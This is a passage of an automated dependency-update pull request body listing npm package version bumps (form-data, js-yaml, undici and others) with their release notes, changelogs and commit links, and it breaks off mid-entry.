[@octokit/plugin-paginate-rest](https://github.com/octokit/plugin-paginate-rest.js) | `2.21.3` | `14.0.0` |\n| [brace-expansion](https://github.com/juliangruber/brace-expansion) | `1.1.11` | `1.1.12` |\n| [flatted](https://github.com/WebReflection/flatted) | `3.2.9` | `3.4.2` |\n| [minimatch](https://github.com/isaacs/minimatch) | `3.1.2` | `3.1.5` |\n| [undici](https://github.com/nodejs/undici) | `5.28.5` | `6.24.1` |\n\n\nUpdates `form-data` from 2.5.1 to 2.5.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.5.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBuffer.from\u003c/code\u003e and \u003ccode\u003eBuffer.alloc\u003c/code\u003e require node 4+\u003c/li\u003e\n\u003cli\u003enpmignore temporary build files (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emove util.isArray to Array.isArray (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/564\"\u003e#564\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emigrate from travis to GHA\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.4...v2.5.5\"\u003ev2.5.5\u003c/a\u003e - 2025-07-18\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] use proper dependency \u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.3...v2.5.4\"\u003ev2.5.4\u003c/a\u003e - 2025-07-17\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] update linting config \u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/b5101ad3d5f73cfd0143aae3735b92826fd731ea\"\u003e\u003ccode\u003eb5101ad\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/97ac9c208be0b83faeee04bb3faef1ed3474ee4c\"\u003e\u003ccode\u003e97ac9c2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/be99d4eea5ce47139c23c1f0914596194019d7fb\"\u003e\u003ccode\u003ebe99d4e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/ddbc89b6d6d64f730bcb27cb33b7544068466a05\"\u003e\u003ccode\u003eddbc89b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/e351a97e9f6c57c74ffd01625e83b09de805d08a\"\u003e\u003ccode\u003ee351a97\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused script \u003ca href=\"https://github.com/form-data/form-data/commit/8f233664842da5bd605ce85541defc713d1d1e0a\"\u003e\u003ccode\u003e8f23366\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing peer dep \u003ca href=\"https://github.com/form-data/form-data/commit/02ff026fda71f9943cfdd5754727c628adb8d135\"\u003e\u003ccode\u003e02ff026\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2fd5f61ebfb526cd015fb8e7b8b8c1add4a38872\"\u003e\u003ccode\u003e2fd5f61\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.2...v2.5.3\"\u003ev2.5.3\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003eObject.prototype.hasOwnProperty.call\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6e682d4bd41de7e80de41e3c4ee10f23fcc3dd00\"\u003e\u003ccode\u003e6e682d4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@types/node\u003c/code\u003e, \u003ccode\u003ebrowserify\u003c/code\u003e, \u003ccode\u003ecoveralls\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003eformidable\u003c/code\u003e, \u003ccode\u003ein-publish\u003c/code\u003e, \u003ccode\u003ephantomjs-prebuilt\u003c/code\u003e, \u003ccode\u003epkgfiles\u003c/code\u003e, \u003ccode\u003epre-commit\u003c/code\u003e, \u003ccode\u003erequest\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e, \u003ccode\u003etypescript\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/819f6b7a543306a891fca37c3a06d0ff4a734422\"\u003e\u003ccode\u003e819f6b7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/form-data/form-data/commit/b170ee2b22b4c695c363b811c0c553d2fb1bbd79\"\u003e\u003ccode\u003eb170ee2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003ecombined-stream\u003c/code\u003e, \u003ccode\u003emime-types\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6b1ca1dc7362a1b1c3a99a885516cca4b7eb817f\"\u003e\u003ccode\u003e6b1ca1d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped version 2.5.3 \u003ca href=\"https://github.com/form-data/form-data/commit/9457283e1dce6122adc908fdd7442cfc54cabe7a\"\u003e\u003ccode\u003e9457283\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003erequest\u003c/code\u003e which via \u003ccode\u003etough-cookie\u003c/code\u003e ^2.4 depends on \u003ccode\u003epsl\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/9dbe192be3db215eac4d9c0b980470a5c2c030c6\"\u003e\u003ccode\u003e9dbe192\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.2\"\u003ev2.5.2\u003c/a\u003e - 2024-10-10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/40de5a74209992979f6695d894c1d554ddb72f29\"\u003e\u003ccode\u003e40de5a7\u003c/code\u003e\u003c/a\u003e v2.5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e [Fix] use proper dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/efe6c2693159084b18c58648e77203d1d810395b\"\u003e\u003ccode\u003eefe6c26\u003c/code\u003e\u003c/a\u003e v2.5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b70869dad20175aad0230ad5f1d030fb76232df8\"\u003e\u003ccode\u003eb70869d\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e [Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e [eslint] update linting config\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `form-data` from 4.0.0 to 4.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/releases\"\u003eform-data's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.5.2\u003c/h2\u003e\n\u003ch3\u003eFixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eBuffer.from\u003c/code\u003e and \u003ccode\u003eBuffer.alloc\u003c/code\u003e require node 4+\u003c/li\u003e\n\u003cli\u003enpmignore temporary build files (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003emove util.isArray to Array.isArray (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/564\"\u003e#564\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eTests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003emigrate from travis to GHA\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/form-data/form-data/blob/master/CHANGELOG.md\"\u003eform-data's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.4...v2.5.5\"\u003ev2.5.5\u003c/a\u003e - 2025-07-18\u003c/h2\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[meta] actually ensure the readme backup isn’t published \u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] use proper dependency \u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.3...v2.5.4\"\u003ev2.5.4\u003c/a\u003e - 2025-07-17\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/577\"\u003e\u003ccode\u003e[#577](https://github.com/form-data/form-data/issues/577)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[eslint] update linting config \u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] add \u003ccode\u003eauto-changelog\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/b5101ad3d5f73cfd0143aae3735b92826fd731ea\"\u003e\u003ccode\u003eb5101ad\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23 \u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values \u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method \u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] Switch to newer v8 prediction library; enable node 24 testing \u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003ehasown\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/97ac9c208be0b83faeee04bb3faef1ed3474ee4c\"\u003e\u003ccode\u003e97ac9c2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] remove local commit hooks \u003ca href=\"https://github.com/form-data/form-data/commit/be99d4eea5ce47139c23c1f0914596194019d7fb\"\u003e\u003ccode\u003ebe99d4e\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused deps \u003ca href=\"https://github.com/form-data/form-data/commit/ddbc89b6d6d64f730bcb27cb33b7544068466a05\"\u003e\u003ccode\u003eddbc89b\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix scripts to use prepublishOnly \u003ca href=\"https://github.com/form-data/form-data/commit/e351a97e9f6c57c74ffd01625e83b09de805d08a\"\u003e\u003ccode\u003ee351a97\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] remove unused script \u003ca href=\"https://github.com/form-data/form-data/commit/8f233664842da5bd605ce85541defc713d1d1e0a\"\u003e\u003ccode\u003e8f23366\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] add missing peer dep \u003ca href=\"https://github.com/form-data/form-data/commit/02ff026fda71f9943cfdd5754727c628adb8d135\"\u003e\u003ccode\u003e02ff026\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[meta] fix readme capitalization \u003ca href=\"https://github.com/form-data/form-data/commit/2fd5f61ebfb526cd015fb8e7b8b8c1add4a38872\"\u003e\u003ccode\u003e2fd5f61\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.2...v2.5.3\"\u003ev2.5.3\u003c/a\u003e - 2025-02-14\u003c/h2\u003e\n\u003ch3\u003eMerged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available \u003ca href=\"https://redirect.github.com/form-data/form-data/pull/573\"\u003e\u003ccode\u003e[#573](https://github.com/form-data/form-data/issues/573)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] set \u003ccode\u003eSymbol.toStringTag\u003c/code\u003e when available (\u003ca href=\"https://redirect.github.com/form-data/form-data/issues/573\"\u003e#573\u003c/a\u003e) \u003ca href=\"https://redirect.github.com/form-data/form-data/issues/396\"\u003e\u003ccode\u003e[#396](https://github.com/form-data/form-data/issues/396)\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eCommits\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e[Refactor] use \u003ccode\u003eObject.prototype.hasOwnProperty.call\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6e682d4bd41de7e80de41e3c4ee10f23fcc3dd00\"\u003e\u003ccode\u003e6e682d4\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@types/node\u003c/code\u003e, \u003ccode\u003ebrowserify\u003c/code\u003e, \u003ccode\u003ecoveralls\u003c/code\u003e, \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003eformidable\u003c/code\u003e, \u003ccode\u003ein-publish\u003c/code\u003e, \u003ccode\u003ephantomjs-prebuilt\u003c/code\u003e, \u003ccode\u003epkgfiles\u003c/code\u003e, \u003ccode\u003epre-commit\u003c/code\u003e, \u003ccode\u003erequest\u003c/code\u003e, \u003ccode\u003etape\u003c/code\u003e, \u003ccode\u003etypescript\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/819f6b7a543306a891fca37c3a06d0ff4a734422\"\u003e\u003ccode\u003e819f6b7\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOnly apps should have lockfiles \u003ca href=\"https://github.com/form-data/form-data/commit/b170ee2b22b4c695c363b811c0c553d2fb1bbd79\"\u003e\u003ccode\u003eb170ee2\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003ecombined-stream\u003c/code\u003e, \u003ccode\u003emime-types\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/6b1ca1dc7362a1b1c3a99a885516cca4b7eb817f\"\u003e\u003ccode\u003e6b1ca1d\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBumped version 2.5.3 \u003ca href=\"https://github.com/form-data/form-data/commit/9457283e1dce6122adc908fdd7442cfc54cabe7a\"\u003e\u003ccode\u003e9457283\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] pin \u003ccode\u003erequest\u003c/code\u003e which via \u003ccode\u003etough-cookie\u003c/code\u003e ^2.4 depends on \u003ccode\u003epsl\u003c/code\u003e \u003ca href=\"https://github.com/form-data/form-data/commit/9dbe192be3db215eac4d9c0b980470a5c2c030c6\"\u003e\u003ccode\u003e9dbe192\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.2\"\u003ev2.5.2\u003c/a\u003e - 2024-10-10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/40de5a74209992979f6695d894c1d554ddb72f29\"\u003e\u003ccode\u003e40de5a7\u003c/code\u003e\u003c/a\u003e v2.5.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/026abe5c5c0489d8a2ccb59d5cfd14fb63078377\"\u003e\u003ccode\u003e026abe5\u003c/code\u003e\u003c/a\u003e [Fix] use proper dependency\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/10626c0a9b78c7d3fcaa51772265015ee0afc25c\"\u003e\u003ccode\u003e10626c0\u003c/code\u003e\u003c/a\u003e [meta] actually ensure the readme backup isn’t published\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/efe6c2693159084b18c58648e77203d1d810395b\"\u003e\u003ccode\u003eefe6c26\u003c/code\u003e\u003c/a\u003e v2.5.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/c97cfbed9eb6d2d4b5d53090f69ded4bf9fd8a21\"\u003e\u003ccode\u003ec97cfbe\u003c/code\u003e\u003c/a\u003e [Tests] Switch to newer v8 prediction library; enable node 24 testing\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/0e93122358414942393d9c2dc434ae69e58be7c8\"\u003e\u003ccode\u003e0e93122\u003c/code\u003e\u003c/a\u003e [Tests] handle predict-v8-randomness failures in node \u0026lt; 17 and node \u0026gt; 23\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b88316c94bb004323669cd3639dc8bb8262539eb\"\u003e\u003ccode\u003eb88316c\u003c/code\u003e\u003c/a\u003e [Fix] Switch to using \u003ccode\u003ecrypto\u003c/code\u003e random for boundary values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/b70869dad20175aad0230ad5f1d030fb76232df8\"\u003e\u003ccode\u003eb70869d\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eappend\u003c/code\u003e: avoid a crash on nullish values\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/131ae5efa30b9c608add4faef3befb38aa2e1bf1\"\u003e\u003ccode\u003e131ae5e\u003c/code\u003e\u003c/a\u003e [Fix] validate boundary type in \u003ccode\u003esetBoundary()\u003c/code\u003e method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/form-data/form-data/commit/8bf2492e0555d41ff58fa04c91593af998f87a3c\"\u003e\u003ccode\u003e8bf2492\u003c/code\u003e\u003c/a\u003e [eslint] update linting config\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/form-data/form-data/compare/v2.5.1...v2.5.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~ljharb\"\u003eljharb\u003c/a\u003e, a new releaser for form-data since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eInstall script changes\u003c/summary\u003e\n\u003cp\u003eThis version modifies \u003ccode\u003eprepublish\u003c/code\u003e script that runs during installation. Review the package contents before updating.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as 